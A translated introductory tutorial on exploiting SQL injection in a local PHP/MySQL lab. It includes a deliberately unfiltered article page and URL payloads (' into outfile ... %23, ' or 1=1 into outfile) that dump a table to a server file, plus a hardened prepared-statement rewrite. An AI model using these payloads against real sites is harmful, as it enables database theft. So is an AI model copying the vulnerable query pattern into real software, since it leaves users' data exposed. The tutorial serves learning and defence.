If you want to test locally, the demo code can be downloaded free of charge (no points required): Using SQL Injection Vulnerabilities to Drag the Library ("drag library" here means dumping a whole table or database).
As in the previous article, we need to create a table and insert several rows into it for testing.
Create the table in the database:
-- column widths int(11) and varchar(100) are assumed; the originals were garbled
CREATE TABLE `article` (
  `articleid` int(11) NOT NULL AUTO_INCREMENT,
  `title` varchar(100) CHARACTER SET utf8 NOT NULL DEFAULT '',
  `content` text CHARACTER SET utf8 NOT NULL,
  PRIMARY KEY (`articleid`)
) ENGINE=MyISAM AUTO_INCREMENT=7 DEFAULT CHARSET=latin1;
I won't include the code that inserts the rows into the table; you can download it and import it into the database directly.
Next, write a page that handles the user's request. We deliberately do not filter the data submitted by the user, leaving a SQL injection vulnerability to test against.
The code is as follows:
<?php
// Deliberately vulnerable demo, as in the original: it uses the legacy mysql_* extension
// (removed in PHP 7) and splices user input straight into the query.
$servername = "localhost";
$dbusername = "root";
$dbpassword = "";
$dbname = "Test";
$id = $_GET['id']; // id is left unfiltered on purpose: this is the injection point
$conn = mysql_connect($servername, $dbusername, $dbpassword) or die("database connection failed");
mysql_select_db($dbname, $conn);
mysql_query('SET NAMES utf8');
$sql = "SELECT * FROM article WHERE articleid='$id'"; // user input becomes part of the SQL text
$result = mysql_query($sql, $conn);
$row = mysql_fetch_array($result);
echo "<p>Using a SQL injection vulnerability to drag the library<p>";
if (!$row) {
    echo "The record does not exist";
    exit;
}
echo "title<br>" . $row['title'] . "<p>";
echo "content<br>" . $row['content'] . "<p>"; // the column is named content, matching the table
?>
We enter the following directly in the browser:
http://127.0.0.1/marcofly/phpstudy/sqlinsert/showart.php?id=1
This displays the record with ID 1 from the article table.
The result of the visit is as follows:
Next, we exploit this vulnerability (if the hole were not already known, it would have to be found with tools plus manual testing) to demonstrate how to download the article table.
Enter the following in the address bar, appended to the id parameter: ' into outfile 'e:/sql.txt'%23
Analysis: %23 is the URL encoding of #. If you type a literal # into the address bar, the browser treats it as a fragment separator and never sends it (or anything after it) to the server, so the database would receive an empty value. Entering %23 instead makes the server decode it to #, which then comments out the remainder of the SQL statement.
After running it, open the E: drive: a new file, sql.txt, has appeared, and it contains one record from the article table.
Why is there only one record? Does the table have only one record? No: we only retrieved the record with ID 1. Can we download all the records in the article table at once?
The answer is yes, as long as the SQL statement you construct is flexible enough (again, it comes down to the flexibility with which SQL statements are constructed).
To analyse it: when ' into outfile 'e:/sql.txt'%23 is entered in the URL address bar, the merged SQL query becomes:
SELECT * FROM article WHERE articleid='5' into outfile 'e:/whf.txt'#'
After careful analysis, we can construct the SQL statement like this instead:
SELECT * FROM article WHERE articleid='' or 1=1 into outfile 'e:/whf.txt'#'
In that case the WHERE clause is always true; in other words, the statement is equivalent to:
SELECT * FROM article into outfile 'e:/whf.txt'#'
As you can see, the statement retrieves the entire contents of the article table and then executes into outfile 'e:/whf.txt' to write them out.
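The root cause in the handler above is that $id is spliced into the SQL text, so the quote in ' or 1=1 into outfile ... changes the statement's structure. Below is an added example (not the original post's code) of the same article page with the hole closed: the id is validated as an integer, the query is sent through a PDO prepared statement with a bound parameter, and the connection uses a database account that is assumed to lack the FILE privilege. The account name and password are placeholders; the database name Test and the article table match the schema above.

```php
<?php
// Added example: hardened version of the page's showart.php (not the original code).
declare(strict_types=1);

$servername = "localhost";
$dbusername = "webapp_ro";   // assumed: low-privilege account, no FILE privilege
$dbpassword = "change-me";   // placeholder
$dbname     = "Test";

// 1. Validate the type before the value gets anywhere near SQL.
//    filter_var() returns false for "1' or 1=1 into outfile ...", for "", etc.
$id = filter_var($_GET['id'] ?? '', FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
if ($id === false) {
    http_response_code(400);
    echo "Invalid article id";
    exit;
}

// 2. PDO with emulated prepares disabled: the id travels as a bound parameter
//    and is never part of the statement text the server parses.
try {
    $pdo = new PDO(
        "mysql:host=$servername;dbname=$dbname;charset=utf8mb4",
        $dbusername,
        $dbpassword,
        [
            PDO::ATTR_ERRMODE            => PDO::ERRMODE_EXCEPTION,
            PDO::ATTR_EMULATE_PREPARES   => false,
            PDO::ATTR_DEFAULT_FETCH_MODE => PDO::FETCH_ASSOC,
        ]
    );
} catch (PDOException $e) {
    http_response_code(500);
    error_log("database connection failed: " . $e->getMessage()); // detail to the log, not the browser
    echo "database connection failed";
    exit;
}

// 3. Select only the columns the page needs; the placeholder replaces "'$id'".
$stmt = $pdo->prepare("SELECT title, content FROM article WHERE articleid = :id");
$stmt->bindValue(':id', $id, PDO::PARAM_INT);
$stmt->execute();
$row = $stmt->fetch();

echo "<p>Article viewer</p>";
if (!$row) {
    echo "The record does not exist";
    exit;
}

// 4. Escape on output so stored content cannot inject HTML into the page either.
echo "title<br>" . htmlspecialchars($row['title'], ENT_QUOTES, 'UTF-8') . "<p>";
echo "content<br>" . htmlspecialchars($row['content'], ENT_QUOTES, 'UTF-8') . "<p>";
```

With the parameter bound, the payload from the address bar fails the integer check and is rejected with a 400 before any query runs; even if a string column were involved, the bound value would be compared literally rather than parsed as SQL. As defence in depth on the server side, MySQL only honours INTO OUTFILE for accounts holding the global FILE privilege, and the secure_file_priv setting restricts (or, when set to NULL, disables) the directory the server may write to, so a web application account should never be connected as root as the demo does.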
If you don't believe me, try it yourself...
With a SQL injection vulnerability we can guess the table name, the column names, the length of a user's password (via the LEFT function), and so on. Of course, if you can dump all the data in the table directly as in the demo above, there is no need to guess column names at all.
I'm a little tired, so I'll stop here.
"Using SQL injection vulnerabilities to log in to the back end" and "Using SQL injection vulnerabilities to drag the library" are a brief summary I wrote after learning the relevant material. They are not in depth; treat them as an introductory write-up and a summary, nothing more.